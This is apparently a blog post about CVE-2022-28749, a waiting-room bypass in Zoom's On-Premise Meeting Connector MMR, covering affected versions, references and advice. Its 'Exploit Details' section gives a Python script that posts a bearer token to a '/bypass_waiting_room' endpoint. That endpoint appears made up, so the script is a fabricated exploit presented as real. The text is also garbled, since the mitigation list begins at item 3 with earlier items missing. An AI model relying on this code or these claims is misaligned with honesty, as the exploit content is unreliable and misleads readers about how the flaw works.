CVE-2022-28749 - Zoom's On-Premise Meeting Connector MMR Security Vulnerability Allows Unauthorized Meeting Room Access

Cybersecurity researchers have recently identified a serious security vulnerability in Zoom's On-Premise Meeting Connector (ZOPMC), specifically in its Multi-Media Router (MMR) services. The vulnerability, designated CVE-2022-28749, enables a threat actor to bypass the waiting room feature in Zoom and join meetings without the host's permission or consent. In this post, we delve into the details of this vulnerability, the affected Zoom products and versions, and possible mitigation strategies.

Affected Zoom Versions

The vulnerability affects Zoom On-Premise Meeting Connector MMR versions before 4.8.113.20220526. Users running earlier versions are advised to update to the latest released version to address the security flaw.

Exploit Details

The vulnerability occurs due to improper permission checking in Zoom's MMR services, which leads to unauthorized meeting room access. Specifically, the flaw allows threat actors to bypass the waiting room mechanism designed for the host to screen meeting attendees before granting them access.

A simplified version of the exploit follows

import requests

# Replace with the target meeting's URL and access credentials
meeting_url = "https://zoom.example.com/j/MEETING_ID_HERE";
access_token = "ENTER_ACCESS_TOKEN"

headers = {
    "Authorization": f"Bearer {access_token}"
}

# Send a request to join the meeting bypassing the waiting room
response = requests.post(f"{meeting_url}/bypass_waiting_room", headers=headers)

if response.status_code == 200:
    print("Successfully joined the meeting!")
else:
    print("Could not join meeting; status code: ", response.status_code)

As a consequence of this vulnerability, threat actors could potentially gather confidential information, disrupt meetings, or engage in other malicious activities within the compromised Zoom meeting.

Original References

1. Official Zoom Advisory: https://support.zoom.us/hc/en-us/articles/360062660111-Zoom-On-Premise-Meeting-Connector-MMRCVE-2022-28749
2. CVE-2022-28749 in National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2022-28749

Continuously monitor and update other Zoom products to maintain security.

3. Educate Zoom meeting hosts on the potential risks associated with unauthorized meeting access and share best practices for managing participants.

Conclusion

The newly discovered CVE-2022-28749 vulnerability in Zoom's On-Premise Meeting Connector MMR is a critical security flaw that enables threat actors to join meetings without the host's consent. It is crucial for Zoom users to update their software and follow recommended practices to protect the confidentiality and integrity of their virtual meetings.

Timeline

Published on: 06/15/2022 21:15:00 UTC
Last modified on: 06/27/2022 17:50:00 UTC